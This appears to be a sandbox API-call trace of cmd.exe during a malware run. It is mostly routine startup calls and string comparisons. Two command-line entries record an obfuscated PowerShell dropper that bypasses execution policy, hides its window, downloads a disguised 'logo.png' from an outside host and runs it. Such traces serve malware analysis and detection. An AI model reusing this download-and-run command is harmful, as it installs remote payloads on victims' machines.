	[0051.019] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0051.019] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0051.019] GetCurrentThreadId () returned 0x844
	[0051.019] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x844) returned 0x3c
	[0051.020] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0051.020] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0051.020] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0051.020] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0051.020] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efad8 | out: phkResult=0x1efad8*=0x0) returned 0x2
	[0051.020] VirtualQuery (in: lpAddress=0x1efac0, lpBuffer=0x1efa40, dwLength=0x30 | out: lpBuffer=0x1efa40*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0051.020] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efa40, dwLength=0x30 | out: lpBuffer=0x1efa40*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0051.020] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efa40, dwLength=0x30 | out: lpBuffer=0x1efa40*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0051.020] VirtualQuery (in: lpAddress=0xf4000, lpBuffer=0x1efa40, dwLength=0x30 | out: lpBuffer=0x1efa40*(BaseAddress=0xf4000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0051.020] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efa40, dwLength=0x30 | out: lpBuffer=0x1efa40*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0051.020] GetConsoleOutputCP () returned 0x1b5
	[0051.020] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0051.021] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0051.021] _get_osfhandle (_FileHandle=1) returned 0x7
	[0051.021] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0051.021] _get_osfhandle (_FileHandle=1) returned 0x7
	[0051.021] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0051.021] _get_osfhandle (_FileHandle=1) returned 0x7
	[0051.021] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0051.021] _get_osfhandle (_FileHandle=0) returned 0x3
	[0051.021] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0051.022] _get_osfhandle (_FileHandle=0) returned 0x3
	[0051.022] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0051.022] GetEnvironmentStringsW () returned 0x268f20*
	[0051.022] GetProcessHeap () returned 0x250000
	[0051.022] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xad4) returned 0x269a00
	[0051.022] FreeEnvironmentStringsW (penv=0x268f20) returned 1
	[0051.022] GetProcessHeap () returned 0x250000
	[0051.022] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x8) returned 0x2687a0
	[0051.022] GetEnvironmentStringsW () returned 0x268f20*
	[0051.022] GetProcessHeap () returned 0x250000
	[0051.022] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xad4) returned 0x26a4e0
	[0051.022] FreeEnvironmentStringsW (penv=0x268f20) returned 1
	[0051.022] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee998 | out: phkResult=0x1ee998*=0x44) returned 0x0
	[0051.022] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x0, lpData=0x1ee9b0*=0x18, lpcbData=0x1ee994*=0x1000) returned 0x2
	[0051.022] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x4, lpData=0x1ee9b0*=0x1, lpcbData=0x1ee994*=0x4) returned 0x0
	[0051.022] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x0, lpData=0x1ee9b0*=0x1, lpcbData=0x1ee994*=0x1000) returned 0x2
	[0051.022] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x4, lpData=0x1ee9b0*=0x0, lpcbData=0x1ee994*=0x4) returned 0x0
	[0051.023] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x4, lpData=0x1ee9b0*=0x40, lpcbData=0x1ee994*=0x4) returned 0x0
	[0051.023] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x4, lpData=0x1ee9b0*=0x40, lpcbData=0x1ee994*=0x4) returned 0x0
	[0051.023] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x0, lpData=0x1ee9b0*=0x40, lpcbData=0x1ee994*=0x1000) returned 0x2
	[0051.023] RegCloseKey (hKey=0x44) returned 0x0
	[0051.023] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee998 | out: phkResult=0x1ee998*=0x44) returned 0x0
	[0051.023] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x0, lpData=0x1ee9b0*=0x40, lpcbData=0x1ee994*=0x1000) returned 0x2
	[0051.023] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x4, lpData=0x1ee9b0*=0x1, lpcbData=0x1ee994*=0x4) returned 0x0
	[0051.023] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x0, lpData=0x1ee9b0*=0x1, lpcbData=0x1ee994*=0x1000) returned 0x2
	[0051.023] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x4, lpData=0x1ee9b0*=0x0, lpcbData=0x1ee994*=0x4) returned 0x0
	[0051.023] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x4, lpData=0x1ee9b0*=0x9, lpcbData=0x1ee994*=0x4) returned 0x0
	[0051.023] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x4, lpData=0x1ee9b0*=0x9, lpcbData=0x1ee994*=0x4) returned 0x0
	[0051.023] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee990, lpData=0x1ee9b0, lpcbData=0x1ee994*=0x1000 | out: lpType=0x1ee990*=0x0, lpData=0x1ee9b0*=0x9, lpcbData=0x1ee994*=0x1000) returned 0x2
	[0051.023] RegCloseKey (hKey=0x44) returned 0x0
	[0051.023] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e42
	[0051.023] srand (_Seed=0x5d3b2e42) 
	[0051.023] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0051.023] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0051.023] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0051.024] GetProcessHeap () returned 0x250000
	[0051.024] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x268f20
	[0051.024] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x268f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0051.024] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0051.024] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0051.024] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0051.024] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0051.024] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0051.024] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0051.024] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0051.024] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0051.024] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0051.024] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0051.024] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0051.024] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0051.024] GetProcessHeap () returned 0x250000
	[0051.024] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x269a00 | out: hHeap=0x250000) returned 1
	[0051.024] GetEnvironmentStringsW () returned 0x269140*
	[0051.024] GetProcessHeap () returned 0x250000
	[0051.024] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xaec) returned 0x26bad0
	[0051.024] FreeEnvironmentStringsW (penv=0x269140) returned 1
	[0051.024] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0051.025] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0051.025] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0051.025] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0051.025] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0051.025] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0051.025] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0051.025] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0051.025] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0051.025] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0051.025] GetProcessHeap () returned 0x250000
	[0051.025] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x48) returned 0x268d80
	[0051.025] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef7a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0051.025] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x1ef7a0, lpFilePart=0x1ef780 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x1ef780*="Documents") returned 0x1b
	[0051.025] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0051.025] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef4b0 | out: lpFindFileData=0x1ef4b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x26c5d0
	[0051.025] FindClose (in: hFindFile=0x26c5d0 | out: hFindFile=0x26c5d0) returned 1
	[0051.025] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x1ef4b0 | out: lpFindFileData=0x1ef4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x26c5d0
	[0051.026] FindClose (in: hFindFile=0x26c5d0 | out: hFindFile=0x26c5d0) returned 1
	[0051.026] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x1ef4b0 | out: lpFindFileData=0x1ef4b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x26c5d0
	[0051.026] FindClose (in: hFindFile=0x26c5d0 | out: hFindFile=0x26c5d0) returned 1
	[0051.026] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0051.026] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0051.026] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0051.026] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0051.026] GetProcessHeap () returned 0x250000
	[0051.026] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26bad0 | out: hHeap=0x250000) returned 1
	[0051.026] GetEnvironmentStringsW () returned 0x26afd0*
	[0051.026] GetProcessHeap () returned 0x250000
	[0051.026] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb2c) returned 0x26bb10
	[0051.026] FreeEnvironmentStringsW (penv=0x26afd0) returned 1
	[0051.026] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0051.026] GetProcessHeap () returned 0x250000
	[0051.026] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268d80 | out: hHeap=0x250000) returned 1
	[0051.026] GetProcessHeap () returned 0x250000
	[0051.026] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4016) returned 0x26c650
	[0051.027] GetProcessHeap () returned 0x250000
	[0051.027] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x269c80
	[0051.027] GetProcessHeap () returned 0x250000
	[0051.027] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26c650 | out: hHeap=0x250000) returned 1
	[0051.027] GetConsoleOutputCP () returned 0x1b5
	[0051.027] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0051.027] GetUserDefaultLCID () returned 0x409
	[0051.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0051.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef8b0, cchData=128 | out: lpLCData="0") returned 2
	[0051.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef8b0, cchData=128 | out: lpLCData="0") returned 2
	[0051.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef8b0, cchData=128 | out: lpLCData="1") returned 2
	[0051.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0051.027] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0051.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0051.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0051.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0051.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0051.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0051.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0051.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0051.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0051.028] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0051.028] GetProcessHeap () returned 0x250000
	[0051.028] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x20c) returned 0x269f60
	[0051.029] GetConsoleTitleW (in: lpConsoleTitle=0x269f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0051.029] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0051.029] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0051.029] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0051.029] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0051.029] GetProcessHeap () returned 0x250000
	[0051.029] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26c650
	[0051.029] GetProcessHeap () returned 0x250000
	[0051.029] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4010) returned 0x270670
	[0051.029] GetProcessHeap () returned 0x250000
	[0051.029] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x2649a0
	[0051.029] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0051.030] GetProcessHeap () returned 0x250000
	[0051.030] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2649a0 | out: hHeap=0x250000) returned 1
	[0051.030] GetProcessHeap () returned 0x250000
	[0051.030] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270670 | out: hHeap=0x250000) returned 1
	[0051.030] GetProcessHeap () returned 0x250000
	[0051.030] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4010) returned 0x270670
	[0051.030] GetProcessHeap () returned 0x250000
	[0051.030] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x2649a0
	[0051.030] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0051.030] GetProcessHeap () returned 0x250000
	[0051.030] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2649a0 | out: hHeap=0x250000) returned 1
	[0051.030] GetProcessHeap () returned 0x250000
	[0051.030] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270670 | out: hHeap=0x250000) returned 1
	[0051.030] GetProcessHeap () returned 0x250000
	[0051.030] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26c650 | out: hHeap=0x250000) returned 1
	[0051.031] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0051.031] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0051.031] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0051.031] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0051.031] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0051.031] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0051.031] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0051.031] GetProcessHeap () returned 0x250000
	[0051.031] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26a180
	[0051.031] GetProcessHeap () returned 0x250000
	[0051.031] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x2669a0
	[0051.031] GetProcessHeap () returned 0x250000
	[0051.031] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x14) returned 0x268d80
	[0051.032] GetProcessHeap () returned 0x250000
	[0051.032] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26a240
	[0051.211] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0051.211] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0051.211] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0051.211] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0051.211] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0051.211] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0051.211] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0051.211] GetProcessHeap () returned 0x250000
	[0051.211] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26a300
	[0051.211] GetProcessHeap () returned 0x250000
	[0051.211] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x2669e0
	[0051.215] GetConsoleTitleW (in: lpConsoleTitle=0x1ef700, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0051.216] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DIR") returned 19
	[0051.216] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ERASE") returned 18
	[0051.216] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DEL") returned 19
	[0051.216] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TYPE") returned 3
	[0051.216] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COPY") returned 20
	[0051.216] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CD") returned 20
	[0051.216] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CHDIR") returned 20
	[0051.216] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RENAME") returned 5
	[0051.216] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REN") returned 5
	[0051.216] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ECHO") returned 18
	[0051.216] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SET") returned 4
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PAUSE") returned 7
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DATE") returned 19
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TIME") returned 3
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PROMPT") returned 7
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MD") returned 10
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKDIR") returned 10
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RD") returned 5
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RMDIR") returned 5
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PATH") returned 7
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="GOTO") returned 16
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SHIFT") returned 4
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CLS") returned 20
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CALL") returned 20
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VERIFY") returned 1
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VER") returned 1
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VOL") returned 1
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="EXIT") returned 18
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SETLOCAL") returned 4
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ENDLOCAL") returned 18
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TITLE") returned 3
	[0051.217] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="START") returned 4
